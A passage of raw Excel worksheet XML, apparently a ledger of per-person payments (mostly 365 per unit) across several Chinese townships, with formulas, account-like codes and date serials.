        <v>3429</v>
      </c>
      <c r="E1277" s="24" t="s">
        <v>3430</v>
      </c>
      <c r="F1277" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1277" s="24">
        <v>1</v>
      </c>
      <c r="H1277" s="25">
        <v>365</v>
      </c>
      <c r="I1277" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1277" s="41">
        <v>45108</v>
      </c>
      <c r="K1277" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1278" customHeight="1" spans="1:11">
      <c r="A1278" s="23" t="s">
        <v>3431</v>
      </c>
      <c r="B1278" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1278" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D1278" s="24" t="s">
        <v>3432</v>
      </c>
      <c r="E1278" s="24" t="s">
        <v>3358</v>
      </c>
      <c r="F1278" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1278" s="24">
        <v>1</v>
      </c>
      <c r="H1278" s="25">
        <v>365</v>
      </c>
      <c r="I1278" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1278" s="41">
        <v>45108</v>
      </c>
      <c r="K1278" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1279" customHeight="1" spans="1:11">
      <c r="A1279" s="23" t="s">
        <v>3433</v>
      </c>
      <c r="B1279" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1279" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D1279" s="24" t="s">
        <v>3435</v>
      </c>
      <c r="E1279" s="24" t="s">
        <v>3436</v>
      </c>
      <c r="F1279" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1279" s="24">
        <v>1</v>
      </c>
      <c r="H1279" s="25">
        <v>365</v>
      </c>
      <c r="I1279" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1279" s="41">
        <v>45108</v>
      </c>
      <c r="K1279" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1280" customHeight="1" spans="1:11">
      <c r="A1280" s="23" t="s">
        <v>3437</v>
      </c>
      <c r="B1280" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1280" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D1280" s="24" t="s">
        <v>3438</v>
      </c>
      <c r="E1280" s="24" t="s">
        <v>3317</v>
      </c>
      <c r="F1280" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1280" s="24">
        <v>1</v>
      </c>
      <c r="H1280" s="25">
        <v>365</v>
      </c>
      <c r="I1280" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1280" s="41">
        <v>45108</v>
      </c>
      <c r="K1280" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1281" customHeight="1" spans="1:11">
      <c r="A1281" s="23" t="s">
        <v>3439</v>
      </c>
      <c r="B1281" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1281" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D1281" s="24" t="s">
        <v>3440</v>
      </c>
      <c r="E1281" s="24" t="s">
        <v>3441</v>
      </c>
      <c r="F1281" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1281" s="24">
        <v>1</v>
      </c>
      <c r="H1281" s="25">
        <v>365</v>
      </c>
      <c r="I1281" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1281" s="41">
        <v>45108</v>
      </c>
      <c r="K1281" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1282" customHeight="1" spans="1:11">
      <c r="A1282" s="23" t="s">
        <v>3442</v>
      </c>
      <c r="B1282" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1282" s="24" t="s">
        <v>3443</v>
      </c>
      <c r="D1282" s="24" t="s">
        <v>3444</v>
      </c>
      <c r="E1282" s="24" t="s">
        <v>3445</v>
      </c>
      <c r="F1282" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1282" s="24">
        <v>1</v>
      </c>
      <c r="H1282" s="25">
        <v>365</v>
      </c>
      <c r="I1282" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1282" s="41">
        <v>45108</v>
      </c>
      <c r="K1282" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1283" customHeight="1" spans="1:11">
      <c r="A1283" s="23" t="s">
        <v>3446</v>
      </c>
      <c r="B1283" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1283" s="24" t="s">
        <v>3443</v>
      </c>
      <c r="D1283" s="24" t="s">
        <v>3447</v>
      </c>
      <c r="E1283" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F1283" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1283" s="24">
        <v>1</v>
      </c>
      <c r="H1283" s="25">
        <v>365</v>
      </c>
      <c r="I1283" s="24">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J1283" s="41">
        <v>45108</v>
      </c>
      <c r="K1283" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1284" customHeight="1" spans="1:11">
      <c r="A1284" s="23" t="s">
        <v>3448</v>
      </c>
      <c r="B1284" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1284" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D1284" s="24" t="s">
        <v>3449</v>
      </c>
      <c r="E1284" s="24" t="s">
        <v>3260</v>
      </c>
      <c r="F1284" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1284" s="24">
        <v>1</v>
      </c>
      <c r="H1284" s="25">
        <v>365</v>
      </c>
      <c r="I1284" s="24">
        <f t="shared" ref="I1284:I1347" si="20">H1284*G1284</f>
        <v>365</v>
      </c>
      <c r="J1284" s="24">
        <v>45139</v>
      </c>
      <c r="K1284" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1285" customHeight="1" spans="1:11">
      <c r="A1285" s="23" t="s">
        <v>3450</v>
      </c>
      <c r="B1285" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1285" s="24" t="s">
        <v>3451</v>
      </c>
      <c r="D1285" s="24" t="s">
        <v>3452</v>
      </c>
      <c r="E1285" s="24" t="s">
        <v>3387</v>
      </c>
      <c r="F1285" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1285" s="24">
        <v>1</v>
      </c>
      <c r="H1285" s="25">
        <v>365</v>
      </c>
      <c r="I1285" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1285" s="24">
        <v>45292</v>
      </c>
      <c r="K1285" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1286" customHeight="1" spans="1:11">
      <c r="A1286" s="23" t="s">
        <v>3453</v>
      </c>
      <c r="B1286" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1286" s="24" t="s">
        <v>3451</v>
      </c>
      <c r="D1286" s="24" t="s">
        <v>3454</v>
      </c>
      <c r="E1286" s="24" t="s">
        <v>3455</v>
      </c>
      <c r="F1286" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1286" s="24">
        <v>2</v>
      </c>
      <c r="H1286" s="25">
        <v>325</v>
      </c>
      <c r="I1286" s="24">
        <f t="shared" si="20"/>
        <v>650</v>
      </c>
      <c r="J1286" s="24">
        <v>45261</v>
      </c>
      <c r="K1286" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1287" customHeight="1" spans="1:11">
      <c r="A1287" s="23" t="s">
        <v>3456</v>
      </c>
      <c r="B1287" s="24" t="str">
        <f>B1286</f>
        <v>留山镇</v>
      </c>
      <c r="C1287" s="24" t="str">
        <f>C1286</f>
        <v>建设居委会</v>
      </c>
      <c r="D1287" s="49" t="s">
        <v>3457</v>
      </c>
      <c r="E1287" s="50" t="s">
        <v>3458</v>
      </c>
      <c r="F1287" s="24">
        <f>F1286</f>
        <v>4113210399</v>
      </c>
      <c r="G1287" s="24"/>
      <c r="H1287" s="24"/>
      <c r="I1287" s="24">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="J1287" s="24"/>
      <c r="K1287" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1288" customHeight="1" spans="1:11">
      <c r="A1288" s="23" t="s">
        <v>3459</v>
      </c>
      <c r="B1288" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1288" s="24" t="s">
        <v>3460</v>
      </c>
      <c r="D1288" s="24" t="s">
        <v>3461</v>
      </c>
      <c r="E1288" s="24" t="s">
        <v>3215</v>
      </c>
      <c r="F1288" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1288" s="24">
        <v>1</v>
      </c>
      <c r="H1288" s="25">
        <v>365</v>
      </c>
      <c r="I1288" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1288" s="24">
        <v>45352</v>
      </c>
      <c r="K1288" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1289" customHeight="1" spans="1:11">
      <c r="A1289" s="23" t="s">
        <v>3462</v>
      </c>
      <c r="B1289" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1289" s="24" t="s">
        <v>3443</v>
      </c>
      <c r="D1289" s="24" t="s">
        <v>3463</v>
      </c>
      <c r="E1289" s="24" t="s">
        <v>3215</v>
      </c>
      <c r="F1289" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1289" s="24">
        <v>1</v>
      </c>
      <c r="H1289" s="25">
        <v>365</v>
      </c>
      <c r="I1289" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1289" s="24">
        <v>45352</v>
      </c>
      <c r="K1289" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1290" customHeight="1" spans="1:11">
      <c r="A1290" s="23" t="s">
        <v>3464</v>
      </c>
      <c r="B1290" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1290" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D1290" s="24" t="s">
        <v>3465</v>
      </c>
      <c r="E1290" s="24" t="s">
        <v>3320</v>
      </c>
      <c r="F1290" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1290" s="24">
        <v>1</v>
      </c>
      <c r="H1290" s="25">
        <v>365</v>
      </c>
      <c r="I1290" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1290" s="24">
        <v>45170</v>
      </c>
      <c r="K1290" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1291" customHeight="1" spans="1:11">
      <c r="A1291" s="23" t="s">
        <v>3466</v>
      </c>
      <c r="B1291" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1291" s="24" t="s">
        <v>3451</v>
      </c>
      <c r="D1291" s="24" t="s">
        <v>3467</v>
      </c>
      <c r="E1291" s="24" t="s">
        <v>3468</v>
      </c>
      <c r="F1291" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1291" s="24">
        <v>1</v>
      </c>
      <c r="H1291" s="25">
        <v>365</v>
      </c>
      <c r="I1291" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1291" s="41">
        <v>45474</v>
      </c>
      <c r="K1291" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1292" customHeight="1" spans="1:11">
      <c r="A1292" s="23" t="s">
        <v>3469</v>
      </c>
      <c r="B1292" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1292" s="13" t="s">
        <v>3470</v>
      </c>
      <c r="D1292" s="49" t="s">
        <v>3471</v>
      </c>
      <c r="E1292" s="24" t="s">
        <v>3472</v>
      </c>
      <c r="F1292" s="51">
        <v>4113210309</v>
      </c>
      <c r="G1292" s="24">
        <v>1</v>
      </c>
      <c r="H1292" s="25">
        <v>365</v>
      </c>
      <c r="I1292" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1292" s="41">
        <v>45566</v>
      </c>
      <c r="K1292" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1293" customHeight="1" spans="1:11">
      <c r="A1293" s="23" t="s">
        <v>3473</v>
      </c>
      <c r="B1293" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1293" s="24" t="s">
        <v>3474</v>
      </c>
      <c r="D1293" s="24" t="s">
        <v>3475</v>
      </c>
      <c r="E1293" s="24" t="s">
        <v>2472</v>
      </c>
      <c r="F1293" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1293" s="24">
        <v>1</v>
      </c>
      <c r="H1293" s="25">
        <v>365</v>
      </c>
      <c r="I1293" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1293" s="24">
        <v>45170</v>
      </c>
      <c r="K1293" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1294" customHeight="1" spans="1:11">
      <c r="A1294" s="23" t="s">
        <v>3476</v>
      </c>
      <c r="B1294" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1294" s="24" t="s">
        <v>3477</v>
      </c>
      <c r="D1294" s="24" t="s">
        <v>3478</v>
      </c>
      <c r="E1294" s="24" t="s">
        <v>3200</v>
      </c>
      <c r="F1294" s="52" t="s">
        <v>3479</v>
      </c>
      <c r="G1294" s="24">
        <v>1</v>
      </c>
      <c r="H1294" s="25">
        <v>365</v>
      </c>
      <c r="I1294" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1294" s="41">
        <v>45627</v>
      </c>
      <c r="K1294" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1295" customHeight="1" spans="1:11">
      <c r="A1295" s="23" t="s">
        <v>3480</v>
      </c>
      <c r="B1295" s="24" t="s">
        <v>3192</v>
      </c>
      <c r="C1295" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D1295" s="24" t="s">
        <v>3481</v>
      </c>
      <c r="E1295" s="24" t="s">
        <v>3424</v>
      </c>
      <c r="F1295" s="24">
        <v>4113210399</v>
      </c>
      <c r="G1295" s="24">
        <v>1</v>
      </c>
      <c r="H1295" s="25">
        <v>365</v>
      </c>
      <c r="I1295" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1295" s="24">
        <v>45200</v>
      </c>
      <c r="K1295" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1296" customHeight="1" spans="1:11">
      <c r="A1296" s="23" t="s">
        <v>3482</v>
      </c>
      <c r="B1296" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1296" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1296" s="24" t="s">
        <v>3484</v>
      </c>
      <c r="E1296" s="24" t="s">
        <v>3485</v>
      </c>
      <c r="F1296" s="24" t="s">
        <v>3486</v>
      </c>
      <c r="G1296" s="24">
        <v>1</v>
      </c>
      <c r="H1296" s="25">
        <v>365</v>
      </c>
      <c r="I1296" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1296" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1296" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1297" customHeight="1" spans="1:11">
      <c r="A1297" s="23" t="s">
        <v>3487</v>
      </c>
      <c r="B1297" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1297" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1297" s="24" t="s">
        <v>3488</v>
      </c>
      <c r="E1297" s="24" t="s">
        <v>3489</v>
      </c>
      <c r="F1297" s="24" t="s">
        <v>3486</v>
      </c>
      <c r="G1297" s="24">
        <v>1</v>
      </c>
      <c r="H1297" s="25">
        <v>365</v>
      </c>
      <c r="I1297" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1297" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1297" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1298" customHeight="1" spans="1:11">
      <c r="A1298" s="23" t="s">
        <v>3490</v>
      </c>
      <c r="B1298" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1298" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1298" s="24" t="s">
        <v>3491</v>
      </c>
      <c r="E1298" s="24" t="s">
        <v>2472</v>
      </c>
      <c r="F1298" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1298" s="24">
        <v>1</v>
      </c>
      <c r="H1298" s="25">
        <v>365</v>
      </c>
      <c r="I1298" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1298" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1298" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1299" customHeight="1" spans="1:11">
      <c r="A1299" s="23" t="s">
        <v>3492</v>
      </c>
      <c r="B1299" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1299" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1299" s="24" t="s">
        <v>1183</v>
      </c>
      <c r="E1299" s="24" t="s">
        <v>3493</v>
      </c>
      <c r="F1299" s="24" t="s">
        <v>3494</v>
      </c>
      <c r="G1299" s="24">
        <v>1</v>
      </c>
      <c r="H1299" s="25">
        <v>365</v>
      </c>
      <c r="I1299" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1299" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1299" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1300" customHeight="1" spans="1:11">
      <c r="A1300" s="23" t="s">
        <v>3495</v>
      </c>
      <c r="B1300" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1300" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1300" s="24" t="s">
        <v>3496</v>
      </c>
      <c r="E1300" s="24" t="s">
        <v>3497</v>
      </c>
      <c r="F1300" s="24" t="s">
        <v>3498</v>
      </c>
      <c r="G1300" s="24">
        <v>1</v>
      </c>
      <c r="H1300" s="25">
        <v>365</v>
      </c>
      <c r="I1300" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1300" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1300" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1301" customHeight="1" spans="1:11">
      <c r="A1301" s="23" t="s">
        <v>3499</v>
      </c>
      <c r="B1301" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1301" s="24" t="s">
        <v>3500</v>
      </c>
      <c r="D1301" s="24" t="s">
        <v>3501</v>
      </c>
      <c r="E1301" s="24" t="s">
        <v>3502</v>
      </c>
      <c r="F1301" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1301" s="24">
        <v>1</v>
      </c>
      <c r="H1301" s="25">
        <v>365</v>
      </c>
      <c r="I1301" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1301" s="41">
        <v>45108</v>
      </c>
      <c r="K1301" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1302" customHeight="1" spans="1:11">
      <c r="A1302" s="23" t="s">
        <v>3503</v>
      </c>
      <c r="B1302" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1302" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1302" s="24" t="s">
        <v>3504</v>
      </c>
      <c r="E1302" s="24" t="s">
        <v>3489</v>
      </c>
      <c r="F1302" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1302" s="24">
        <v>1</v>
      </c>
      <c r="H1302" s="25">
        <v>365</v>
      </c>
      <c r="I1302" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1302" s="41">
        <v>45108</v>
      </c>
      <c r="K1302" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1303" customHeight="1" spans="1:11">
      <c r="A1303" s="23" t="s">
        <v>3505</v>
      </c>
      <c r="B1303" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1303" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1303" s="24" t="s">
        <v>3506</v>
      </c>
      <c r="E1303" s="24" t="s">
        <v>3507</v>
      </c>
      <c r="F1303" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1303" s="24">
        <v>1</v>
      </c>
      <c r="H1303" s="25">
        <v>365</v>
      </c>
      <c r="I1303" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1303" s="41">
        <v>45108</v>
      </c>
      <c r="K1303" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1304" customHeight="1" spans="1:11">
      <c r="A1304" s="23" t="s">
        <v>3508</v>
      </c>
      <c r="B1304" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1304" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1304" s="24" t="s">
        <v>3509</v>
      </c>
      <c r="E1304" s="24" t="s">
        <v>3510</v>
      </c>
      <c r="F1304" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1304" s="24">
        <v>1</v>
      </c>
      <c r="H1304" s="25">
        <v>365</v>
      </c>
      <c r="I1304" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1304" s="41">
        <v>45108</v>
      </c>
      <c r="K1304" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1305" customHeight="1" spans="1:11">
      <c r="A1305" s="23" t="s">
        <v>3511</v>
      </c>
      <c r="B1305" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1305" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1305" s="24" t="s">
        <v>3512</v>
      </c>
      <c r="E1305" s="24" t="s">
        <v>3513</v>
      </c>
      <c r="F1305" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1305" s="24">
        <v>2</v>
      </c>
      <c r="H1305" s="25">
        <v>325</v>
      </c>
      <c r="I1305" s="24">
        <f t="shared" si="20"/>
        <v>650</v>
      </c>
      <c r="J1305" s="41">
        <v>45108</v>
      </c>
      <c r="K1305" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1306" customHeight="1" spans="1:11">
      <c r="A1306" s="23" t="s">
        <v>3514</v>
      </c>
      <c r="B1306" s="24" t="str">
        <f>B1305</f>
        <v>小店乡</v>
      </c>
      <c r="C1306" s="24" t="str">
        <f>C1305</f>
        <v>小店乡</v>
      </c>
      <c r="D1306" s="53" t="s">
        <v>3515</v>
      </c>
      <c r="E1306" s="53" t="s">
        <v>3516</v>
      </c>
      <c r="F1306" s="24">
        <f>F1305</f>
        <v>4113210417</v>
      </c>
      <c r="G1306" s="24"/>
      <c r="H1306" s="24"/>
      <c r="I1306" s="24">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="J1306" s="41"/>
      <c r="K1306" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1307" customHeight="1" spans="1:11">
      <c r="A1307" s="23" t="s">
        <v>3517</v>
      </c>
      <c r="B1307" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1307" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1307" s="24" t="s">
        <v>1201</v>
      </c>
      <c r="E1307" s="24" t="s">
        <v>3518</v>
      </c>
      <c r="F1307" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1307" s="24">
        <v>1</v>
      </c>
      <c r="H1307" s="25">
        <v>365</v>
      </c>
      <c r="I1307" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1307" s="41">
        <v>45108</v>
      </c>
      <c r="K1307" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1308" customHeight="1" spans="1:11">
      <c r="A1308" s="23" t="s">
        <v>3519</v>
      </c>
      <c r="B1308" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1308" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1308" s="24" t="s">
        <v>3520</v>
      </c>
      <c r="E1308" s="24" t="s">
        <v>3521</v>
      </c>
      <c r="F1308" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1308" s="24">
        <v>1</v>
      </c>
      <c r="H1308" s="25">
        <v>365</v>
      </c>
      <c r="I1308" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1308" s="41">
        <v>45108</v>
      </c>
      <c r="K1308" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1309" customHeight="1" spans="1:11">
      <c r="A1309" s="23" t="s">
        <v>3522</v>
      </c>
      <c r="B1309" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1309" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1309" s="24" t="s">
        <v>3523</v>
      </c>
      <c r="E1309" s="24" t="s">
        <v>3524</v>
      </c>
      <c r="F1309" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1309" s="24">
        <v>1</v>
      </c>
      <c r="H1309" s="25">
        <v>365</v>
      </c>
      <c r="I1309" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1309" s="41">
        <v>45108</v>
      </c>
      <c r="K1309" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1310" customHeight="1" spans="1:11">
      <c r="A1310" s="23" t="s">
        <v>3525</v>
      </c>
      <c r="B1310" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1310" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1310" s="24" t="s">
        <v>3526</v>
      </c>
      <c r="E1310" s="24" t="s">
        <v>3527</v>
      </c>
      <c r="F1310" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1310" s="24">
        <v>1</v>
      </c>
      <c r="H1310" s="25">
        <v>365</v>
      </c>
      <c r="I1310" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1310" s="41">
        <v>45108</v>
      </c>
      <c r="K1310" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1311" customHeight="1" spans="1:11">
      <c r="A1311" s="23" t="s">
        <v>3528</v>
      </c>
      <c r="B1311" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1311" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1311" s="24" t="s">
        <v>3529</v>
      </c>
      <c r="E1311" s="24" t="s">
        <v>3530</v>
      </c>
      <c r="F1311" s="24" t="s">
        <v>3531</v>
      </c>
      <c r="G1311" s="24">
        <v>1</v>
      </c>
      <c r="H1311" s="25">
        <v>365</v>
      </c>
      <c r="I1311" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1311" s="41">
        <v>45108</v>
      </c>
      <c r="K1311" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1312" customHeight="1" spans="1:11">
      <c r="A1312" s="23" t="s">
        <v>3532</v>
      </c>
      <c r="B1312" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1312" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1312" s="24" t="s">
        <v>3533</v>
      </c>
      <c r="E1312" s="24" t="s">
        <v>3534</v>
      </c>
      <c r="F1312" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1312" s="24">
        <v>1</v>
      </c>
      <c r="H1312" s="25">
        <v>365</v>
      </c>
      <c r="I1312" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1312" s="41">
        <v>45108</v>
      </c>
      <c r="K1312" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1313" customHeight="1" spans="1:11">
      <c r="A1313" s="23" t="s">
        <v>3535</v>
      </c>
      <c r="B1313" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1313" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1313" s="24" t="s">
        <v>3536</v>
      </c>
      <c r="E1313" s="24" t="s">
        <v>3537</v>
      </c>
      <c r="F1313" s="24" t="s">
        <v>3538</v>
      </c>
      <c r="G1313" s="24">
        <v>1</v>
      </c>
      <c r="H1313" s="25">
        <v>365</v>
      </c>
      <c r="I1313" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1313" s="41">
        <v>45108</v>
      </c>
      <c r="K1313" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1314" customHeight="1" spans="1:11">
      <c r="A1314" s="23" t="s">
        <v>3539</v>
      </c>
      <c r="B1314" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="C1314" s="24" t="s">
        <v>3483</v>
      </c>
      <c r="D1314" s="24" t="s">
        <v>3540</v>
      </c>
      <c r="E1314" s="24" t="s">
        <v>3541</v>
      </c>
      <c r="F1314" s="24">
        <v>4113210417</v>
      </c>
      <c r="G1314" s="24">
        <v>1</v>
      </c>
      <c r="H1314" s="25">
        <v>365</v>
      </c>
      <c r="I1314" s="24">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J1314" s="41">
        <v>45108</v>
      </c>
      <c r="K1314" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1315" customHeight="1" spans="1:11">
      <c r="A1315" s="23" t="s">
        <v>3542</v>
      </c>
      <c r="B1315" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1315" s="24" t="s">
        <v>3544</v>
      </c>
      <c r="D1315" s="24" t="s">
        <v>3545</v>
      </c>
      <c r="E1315" s="24" t="s">
        <v>3546</v>
      </c>
      <c r="F1315" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1315" s="24">
        <v>3</v>
      </c>
      <c r="H1315" s="25">
        <v>335</v>
      </c>
      <c r="I1315" s="24">
        <f t="shared" si="20"/>
        <v>1005</v>
      </c>
      <c r="J1315" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1315" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1316" customHeight="1" spans="1:11">
      <c r="A1316" s="23" t="s">
        <v>3548</v>
      </c>
      <c r="B1316" s="24" t="str">
        <f>B1315</f>
        <v>云阳镇</v>
      </c>
